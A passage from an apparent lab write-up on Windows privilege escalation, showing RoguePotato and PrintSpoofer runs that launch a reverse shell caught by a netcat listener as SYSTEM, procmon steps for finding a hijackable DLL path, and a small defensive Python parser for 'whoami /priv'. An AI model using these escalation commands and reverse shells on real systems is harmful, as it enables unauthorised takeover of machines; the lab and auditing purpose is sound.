This command listens for incoming connections on port 135 of the local (Kali) machine and forwards each one to TCP port 9999 on 10.10.198.189, where RoguePotato's rogue OXID resolver will be listening.
Now fire up the nc listener, then run RoguePotato.
```
C:\PrivEsc>RoguePotato.exe -r 10.9.3.94 -e "C:\PrivEsc\reverse.exe" -l 9999
RoguePotato.exe -r 10.9.3.94 -e "C:\PrivEsc\reverse.exe" -l 9999
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] IStoragetrigger written:100 bytes
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: C:\PrivEsc\reverse.exe
[+] RoguePotato gave you the SYSTEM powerz :D

C:\PrivEsc>
```
---------------------------------------------------
```
┌──(arun㉿kali)-[~]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.198.189] 49814
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\PrivEsc>whoami
whoami
nt authority\system

C:\PrivEsc>
```
Hmmmm…Potatoes are really sweet.
PrintSpoofer
Both PrintSpoofer and RoguePotato elevate privileges the same way, by abusing “SeImpersonatePrivilege”.
```
C:\PrivEsc>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeSystemtimePrivilege         Change the system time                    Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege
```
Fire up your netcat listener and run “PrintSpoofer.exe” on the local service shell.
```
C:\PrivEsc>C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
```
-----------------------------------------
```
┌──(arun㉿kali)-[~]
└─$ nc -lnvp 53
listening on [any] 53 ...
connect to [10.9.3.94] from (UNKNOWN) [10.10.198.189] 49958
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
```
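As an added example (not part of the original write-up), this Python snippet parses the `whoami /priv` tables shown in the RoguePotato and PrintSpoofer sections and reports whether a token holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. It treats a Disabled privilege as present, since a process that holds a privilege can enable it, which is the check to run when auditing which accounts the services on a host run as. The sample tables are constructed to match the format above (including a truncated last row like the one in the PrintSpoofer listing); the function names are my own.

```python
import re

# Constructed samples in the format of the "whoami /priv" output shown in this
# write-up: the LOCAL SERVICE token (with a truncated last row, as in the
# PrintSpoofer listing) and the ordinary user token.
SERVICE_PRIV_SAMPLE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeTimeZonePrivilege
"""

USER_PRIV_SAMPLE = """
Privilege Name                Description                    State
============================= ============================== ========
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# The two privileges RoguePotato and PrintSpoofer rely on, as the sections above explain.
TOKEN_ABUSE_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Name, then optionally description and state; the optional part handles truncated rows.
PRIV_RE = re.compile(r"^(Se\w+Privilege)(?:\s+(.*?)\s+(Enabled|Disabled))?$")


def parse_whoami_priv(text):
    """Parse 'whoami /priv' into {name: {"description": ..., "state": ...}}.
    A truncated row keeps its name, with description and state set to None."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line.strip())
        if m:
            privs[m.group(1)] = {"description": m.group(2), "state": m.group(3)}
    return privs


def token_abuse_candidates(privs):
    """The impersonation privileges present in the token and their current state.
    'Disabled' only means not currently enabled: a process that holds the
    privilege can enable it itself, so presence is what matters for risk."""
    return {name: privs[name]["state"] for name in TOKEN_ABUSE_PRIVS if name in privs}


def can_impersonate(privs):
    """True when the token could be used by potato-style or PrintSpoofer escalation."""
    return bool(token_abuse_candidates(privs))


if __name__ == "__main__":
    for label, sample in (("LOCAL SERVICE", SERVICE_PRIV_SAMPLE), ("user", USER_PRIV_SAMPLE)):
        privs = parse_whoami_priv(sample)
        print(f"{label}: impersonation-capable={can_impersonate(privs)} {token_abuse_candidates(privs)}")
```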
Dllhijacking
DLL hijacking is a type of attack that takes advantage of misconfigured applications in Windows. The attacker tricks the application into loading a malicious DLL instead of the intended DLL, allowing the attacker to execute arbitrary code with the same privileges as the application.
```
C:\Users\TCM\Desktop>.\winPEAS64.exe
dllsvc(DLL Hijack Service)["C:\Program Files\DLL Hijack Service\dllhijackservice.exe"] - Manual - Running
```
Open procmon.exe and follow these steps:
* In procmon, select “Filter”. From the left-most drop-down menu, select ‘Process Name’.
* In the input box on the same line type: dllhijackservice.exe
* Make sure the line reads “Process Name is dllhijackservice.exe then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly ‘OK’.
* Next, select ‘Result’ from the left-most drop-down menu.
* In the input box on the same line type: NAME NOT FOUND
* Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly ‘OK’.
* Open a command prompt and type: sc start dllsvc
* Scroll to the bottom of the window. One of the highlighted results shows that the service tried to load ‘C:\Temp\hijackme.dll’ but could not, because the file was not found. Note that ‘C:\Temp’ is a writable location.
Verify the user’s permissions on the Temp directory to determine whether write access to the folder is granted.
Thank you.
hey, I loved the potatoes…